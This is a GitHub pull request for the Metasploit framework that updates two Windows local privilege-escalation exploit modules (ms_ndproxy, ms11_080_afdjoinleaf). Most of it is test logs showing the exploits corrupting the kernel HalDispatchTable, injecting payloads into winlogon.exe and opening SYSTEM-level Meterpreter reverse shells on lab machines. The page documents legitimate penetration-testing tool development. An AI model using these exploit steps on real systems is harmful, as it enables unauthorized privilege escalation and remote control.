Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use new ntdll railgun functions #2762

Merged
merged 2 commits into from Dec 18, 2013
Merged

Use new ntdll railgun functions #2762

merged 2 commits into from Dec 18, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Short history, @zeroSteiner added some functions to railgun, from ntdll, here: #2758

So has no sense which some modules still try to add them by themselves.

Verification

  • Get a session on any vulnerable machine to any of the modified exploits.
  • Run the module on the session
  • You should be enjoying a new SYSTEM session.

Verification is attached for ms11_080_afdjoinleaf and ms_ndproxy

  • ms_ndproxy
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[*] Injecting 290 bytes into 3804 memory and executing it...
[*] Sending stage (769024 bytes) to 192.168.172.244
[+] Enjoy
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1045) at 2013-12-13 16:04:04 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
  • ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set session 3
session => 3
msf exploit(ms11_080_afdjoinleaf) > exploit

[*] Started reverse handler on 10.6.0.165:4444 
[*] Running against Windows XP SP2 / SP3
[*] Kernel Base Address: 0x804d7000
[*] HalDisPatchTable Address: 0x80545838
[*] HaliQuerySystemInformation Address: 0x806e6bba
[*] HalpSetSystemInformation Address: 0x806e9436
[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: Died

[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Injecting the payload into SYSTEM process: winlogon.exe PID: 636
[*] Writing 290 bytes at address 0x00a30000
[*] Sending stage (769024 bytes) to 10.6.0.165
[*] Restoring the original token...
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:57280) at 2013-12-13 16:05:42 -0600

meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 4 closed.  Reason: User exit

@wchen-r7
Copy link
Contributor

Tested:

msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.122
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.122:3544) at 2013-12-18 15:16:09 -0600

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms11_080_afdjoinleaf 
msf exploit(ms11_080_afdjoinleaf) > show options

Module options (exploit/windows/local/ms11_080_afdjoinleaf):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms11_080_afdjoinleaf) > set session 1
session => 1
msf exploit(ms11_080_afdjoinleaf) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Running against Windows XP SP2 / SP3
[*] Kernel Base Address: 0x804d7000
[*] HalDisPatchTable Address: 0x80545838
[*] HaliQuerySystemInformation Address: 0x806e6bba
[*] HalpSetSystemInformation Address: 0x806e9436
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Injecting the payload into SYSTEM process: winlogon.exe PID: 644
[*] Writing 290 bytes at address 0x00a70000
[*] Sending stage (769024 bytes) to 10.0.1.122
[*] Restoring the original token...
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.122:3546) at 2013-12-18 15:17:00 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

wchen-r7 added a commit that referenced this pull request Dec 18, 2013
@wchen-r7
Land #2762 - Use new ntdll railgun functions
4bddd07
@wchen-r7 wchen-r7 merged commit e8396dc into rapid7:master Dec 18, 2013
@jvazquez-r7 jvazquez-r7 deleted the use_new_railgun_stuff branch November 18, 2014 15:58
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7